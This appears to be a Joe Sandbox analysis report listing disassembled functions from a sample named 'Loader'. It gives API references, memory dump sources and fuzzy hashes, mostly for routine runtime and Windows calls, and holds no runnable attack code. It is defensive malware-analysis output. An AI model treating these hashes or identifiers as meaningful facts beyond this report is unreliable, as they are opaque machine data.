                                                                                                  • Instruction ID: eefcc7210dd4e8a402ff685ddd373c8c69b006b1ac175ec58baa60323affb04f
                                                                                                  • Opcode Fuzzy Hash: ed6fe54501dfe6df9cc461f9b4d3138f08fc0ba36553a3893d8638b531f1e4ca
                                                                                                  • Instruction Fuzzy Hash: 94016231B50659AFDB11CF94DC09BAEBBF8FF04B15F044526F811A6690DFB49901CA94
                                                                                                  APIs
                                                                                                  • __alloca_probe_16.LIBCMT ref: 00A7D76F
                                                                                                  • __alloca_probe_16.LIBCMT ref: 00A7D838
                                                                                                  • __freea.LIBCMT ref: 00A7D89F
                                                                                                    • Part of subcall function 00A7BF11: HeapAlloc.KERNEL32(00000000,00000018,00000000,?,00A6A67D,00000018,?,00A63D4A,00000018,00000000), ref: 00A7BF43
                                                                                                  • __freea.LIBCMT ref: 00A7D8B2
                                                                                                  • __freea.LIBCMT ref: 00A7D8BF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1096550386-0
                                                                                                  • Opcode ID: 5fd37f092d825596af274dcf46c23d426e120de1a0a8c5040ce6e22073fe292b
                                                                                                  • Instruction ID: 7d7f422dcffaa4a3d08942f4e48e47780df11c4294aed7f1dc90a1f89130509e
                                                                                                  • Opcode Fuzzy Hash: 5fd37f092d825596af274dcf46c23d426e120de1a0a8c5040ce6e22073fe292b
                                                                                                  • Instruction Fuzzy Hash: 8D51A172600206AFEB259F60DD81EBB7AB9EF84710B15C12DFD0CDB251EB71DC1096A1
                                                                                                  APIs
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00A6F005
                                                                                                  • AcquireSRWLockExclusive.KERNEL32(00A68E38), ref: 00A6F024
                                                                                                  • AcquireSRWLockExclusive.KERNEL32(00A68E38,00A6A2F0,?), ref: 00A6F052
                                                                                                  • TryAcquireSRWLockExclusive.KERNEL32(00A68E38,00A6A2F0,?), ref: 00A6F0AD
                                                                                                  • TryAcquireSRWLockExclusive.KERNEL32(00A68E38,00A6A2F0,?), ref: 00A6F0C4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AcquireExclusiveLock$CurrentThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 66001078-0
                                                                                                  • Opcode ID: c0aaacc9264e5ab426cbfa1afb928365a20165ec20f65da9bb28ebd77ea6b136
                                                                                                  • Instruction ID: 3c4876ce82a86f408938425262c0dfb38033236a4ca8e44af2490a5ccdae6c9e
                                                                                                  • Opcode Fuzzy Hash: c0aaacc9264e5ab426cbfa1afb928365a20165ec20f65da9bb28ebd77ea6b136
                                                                                                  • Instruction Fuzzy Hash: FA41CE7160060ADFCB20CF65E48196AB3F4FF05311B214A3AE456C7542EB30F985CF51
                                                                                                  APIs
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00A63CA5
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00A63CBF
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00A63CE0
                                                                                                  • __Getctype.LIBCPMT ref: 00A63D92
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00A63DD8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$Getctype
                                                                                                  • String ID:
                                                                                                  • API String ID: 3087743877-0
                                                                                                  • Opcode ID: 9b8849eedc1873b96fae1db90e0f9003de5b890ec9ca92f8b839b2602f58e04f
                                                                                                  • Instruction ID: ad58b44c167ffecb72605f8dc2742d8f04d56c0070b85e0996fd8f3210a1c214
                                                                                                  • Opcode Fuzzy Hash: 9b8849eedc1873b96fae1db90e0f9003de5b890ec9ca92f8b839b2602f58e04f
                                                                                                  • Instruction Fuzzy Hash: 3D411472E006188FCB14DF94D945BAABBB1FF94B20F14861AD8156B391DB35AA02CF91
                                                                                                  APIs
                                                                                                  • __EH_prolog3.LIBCMT ref: 00A6D4C9
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00A6D4D3
                                                                                                  • int.LIBCPMT ref: 00A6D4EA
                                                                                                    • Part of subcall function 00A6C1E5: std::_Lockit::_Lockit.LIBCPMT ref: 00A6C1F6
                                                                                                    • Part of subcall function 00A6C1E5: std::_Lockit::~_Lockit.LIBCPMT ref: 00A6C210
                                                                                                  • codecvt.LIBCPMT ref: 00A6D50D
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00A6D544
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
                                                                                                  • String ID:
                                                                                                  • API String ID: 3716348337-0
                                                                                                  • Opcode ID: 57a12361fb29d9a28319baff32e1bccf7faf0912e54352628924f5fec35a9451
                                                                                                  • Instruction ID: 549a932bb34eaa02d69d16fa49eac1dd923b0f3245091af4014775b450616e19
                                                                                                  • Opcode Fuzzy Hash: 57a12361fb29d9a28319baff32e1bccf7faf0912e54352628924f5fec35a9451
                                                                                                  • Instruction Fuzzy Hash: D801F931E001158FCF01EBA4CA15ABDBBB5AF84774F144509F416AB2C1CF349E01CB91
                                                                                                  APIs
                                                                                                  • __EH_prolog3.LIBCMT ref: 00A6ADDE
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00A6ADE9
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00A6AE57
                                                                                                    • Part of subcall function 00A6ACAA: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00A6ACC2
                                                                                                  • std::locale::_Setgloballocale.LIBCPMT ref: 00A6AE04
                                                                                                  • _Yarn.LIBCPMT ref: 00A6AE1A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                  • String ID:
                                                                                                  • API String ID: 1088826258-0
                                                                                                  • Opcode ID: c907e8c6c486f6321f9281281e31b46b114544bb6f2ec126abc6c695092fc004
                                                                                                  • Instruction ID: bba3bb878395a8f9f45b5f41a45fa0cbee2f85e58fd47b92d4b8f9956648e3f6
                                                                                                  • Opcode Fuzzy Hash: c907e8c6c486f6321f9281281e31b46b114544bb6f2ec126abc6c695092fc004
                                                                                                  • Instruction Fuzzy Hash: 8C018F75A006209FCB06FBA0DA5557D7BB5FFA4760B18401AE90667382CF396E42CF82
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _strlen
                                                                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                  • API String ID: 4218353326-1866435925
                                                                                                  • Opcode ID: 4aa337fb7c33b3d3aa20ce6b803985259d88ade1946a1d2b7094f707832c9f65
                                                                                                  • Instruction ID: 8c038087d7adb4ec4a3fea0282ccd6b1d770f7b1da51c6f88de01de2fb25fd3a
                                                                                                  • Opcode Fuzzy Hash: 4aa337fb7c33b3d3aa20ce6b803985259d88ade1946a1d2b7094f707832c9f65
                                                                                                  • Instruction Fuzzy Hash: 4FF15E75A006148FCB14CFA8C494BADBBF1FF88324F198269E815AB3A1D774AD45CF90
                                                                                                  APIs
                                                                                                  • std::_Ref_count_base::_Decref.LIBCPMT ref: 00A6B809
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DecrefRef_count_base::_std::_
                                                                                                  • String ID: MOC$RCC$csm
                                                                                                  • API String ID: 1456557076-2671469338
                                                                                                  • Opcode ID: e5cf386cc5ed18f57de0c76ba7bfa301251284fac922c732ae8a0c6d18e4ae28
                                                                                                  • Instruction ID: 977edcda10af2cb81a87c36a1541a1cb6a0b615a56c4058799bf19b2b53868b2
                                                                                                  • Opcode Fuzzy Hash: e5cf386cc5ed18f57de0c76ba7bfa301251284fac922c732ae8a0c6d18e4ae28
                                                                                                  • Instruction Fuzzy Hash: 2421F235921609DFCF389F94C956A6AB3BCEF54720F14851EE401CB690DB34AEC0CAA0
                                                                                                  APIs
                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00A869DC,00000000,?,00A9D2B0,?,?,?,00A86913,00000004,InitializeCriticalSectionEx,00A90D34,00A90D3C), ref: 00A8694D
                                                                                                  • GetLastError.KERNEL32(?,00A869DC,00000000,?,00A9D2B0,?,?,?,00A86913,00000004,InitializeCriticalSectionEx,00A90D34,00A90D3C,00000000,?,00A7BBBC), ref: 00A86957
                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00A8697F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                  • String ID: api-ms-
                                                                                                  • API String ID: 3177248105-2084034818
                                                                                                  • Opcode ID: f65367fe10e185bcfb5e365152d56166db8ff95fcd5d3947a3907ae331228a63
                                                                                                  • Instruction ID: ff6ab572dd5f14651975a567438a19e21c9f72231140478af9a3ffb5db01d59b
                                                                                                  • Opcode Fuzzy Hash: f65367fe10e185bcfb5e365152d56166db8ff95fcd5d3947a3907ae331228a63
                                                                                                  • Instruction Fuzzy Hash: 19E01A30380204BAEF202BA4EC06B6C3A55AF40B91F184421FA4CA84E0DB72ED659A44
                                                                                                  APIs
                                                                                                  • GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 00A84001
                                                                                                    • Part of subcall function 00A7C021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00A7D895,?,00000000,-00000008), ref: 00A7C082
                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00A84253
                                                                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00A84299
                                                                                                  • GetLastError.KERNEL32 ref: 00A8433C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 2112829910-0
                                                                                                  • Opcode ID: 3370b4aea18a57f3358c20ef2349d52e25b981828188a954c9811ef19ecd71ba
                                                                                                  • Instruction ID: af67fe55dc6fe746bb720b8030332e92d1f80bd435cd9acea8b2d48c7f62dbe0
                                                                                                  • Opcode Fuzzy Hash: 3370b4aea18a57f3358c20ef2349d52e25b981828188a954c9811ef19ecd71ba
                                                                                                  • Instruction Fuzzy Hash: 1CD18A75E042599FCF15DFE8C880AEDBBB5FF18314F28812AE556EB351DA30A942CB50
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AdjustPointer
                                                                                                  • String ID:
                                                                                                  • API String ID: 1740715915-0
                                                                                                  • Opcode ID: 59dfb70806d0d85f25c38b8863c485caf8ae0c6ae1d41dd606411e49df2f9aa1
                                                                                                  • Instruction ID: a9501bef1a6f980798829842158267077c8b86dc42314fd93464d49e88976da1
                                                                                                  • Opcode Fuzzy Hash: 59dfb70806d0d85f25c38b8863c485caf8ae0c6ae1d41dd606411e49df2f9aa1
                                                                                                  • Instruction Fuzzy Hash: 4C51D6B2614601DFDB259F54CD91BAA77B4EF00710F14C52DF80A5B691E731EC90DBA0
                                                                                                  APIs
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00A672C5
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00A67395
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00A673A3
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00A673B1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Cpp_errorThrow_std::_$CurrentThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2261580123-0
                                                                                                  • Opcode ID: 42672d4b11369948661716f96d95b833ed561cdfecd4e537f0afa20b016a2b92
                                                                                                  • Instruction ID: 51274188e0dfa814c27309d5479e5cc069075e2aa0671c2f8de60154cff883df
                                                                                                  • Opcode Fuzzy Hash: 42672d4b11369948661716f96d95b833ed561cdfecd4e537f0afa20b016a2b92
                                                                                                  • Instruction Fuzzy Hash: C341F2B1A10705CBDB21EB64C941B6FB7B4FF44324F144639E81A9B791EB34E854CBA1
                                                                                                  APIs
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00A64495
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00A644B2
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00A644D3
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00A64580
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                  • String ID:
                                                                                                  • API String ID: 593203224-0
                                                                                                  • Opcode ID: ab027e4d7b57a91f7da35171771344f7813b4c2021c24606e958d49bfde184da
                                                                                                  • Instruction ID: 351164fa42ca7d1bffc9114f7faf328be23733283236ffb462b42f7c2f6d7cdb
                                                                                                  • Opcode Fuzzy Hash: ab027e4d7b57a91f7da35171771344f7813b4c2021c24606e958d49bfde184da
                                                                                                  • Instruction Fuzzy Hash: 3F415A71E006188FCF10DF94D984BAEBBB1FB58720F54422AE81667391DB34AD45CFA1
                                                                                                  APIs
                                                                                                    • Part of subcall function 00A7C021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00A7D895,?,00000000,-00000008), ref: 00A7C082
                                                                                                  • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00A81E2A
                                                                                                  • __dosmaperr.LIBCMT ref: 00A81E31
                                                                                                  • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00A81E6B
                                                                                                  • __dosmaperr.LIBCMT ref: 00A81E72
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 1913693674-0
                                                                                                  • Opcode ID: 9372ba9eb66a07567814e8d4709f872f98e8dbcfbbdfdf4f8aac78a35a84ccea
                                                                                                  • Instruction ID: dd352559415253203dca709655dc7e4247e9334294009602ad57bb7e2663740e
                                                                                                  • Opcode Fuzzy Hash: 9372ba9eb66a07567814e8d4709f872f98e8dbcfbbdfdf4f8aac78a35a84ccea
                                                                                                  • Instruction Fuzzy Hash: C8214971A04615AF9B20BFA58D8197BB7ADFF043A4B10C529FC5997251EB30EC52CBA0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b686c06bb96557f0fd5673744bd842f35e67783c990ad791a3095880dfe24b24
                                                                                                  • Instruction ID: 00bb091ea908a6fa78bf4402a64e1aca65b1330daf56ea27e254d175ef5f384a
                                                                                                  • Opcode Fuzzy Hash: b686c06bb96557f0fd5673744bd842f35e67783c990ad791a3095880dfe24b24
                                                                                                  • Instruction Fuzzy Hash: FF21CD71204205AFDB22AFB5CD90A6E77A8FFA03A4B10C529F85D97250EB30EC50C7A0
                                                                                                  APIs
                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 00A831C6
                                                                                                    • Part of subcall function 00A7C021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00A7D895,?,00000000,-00000008), ref: 00A7C082
                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00A831FE
                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00A8321E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
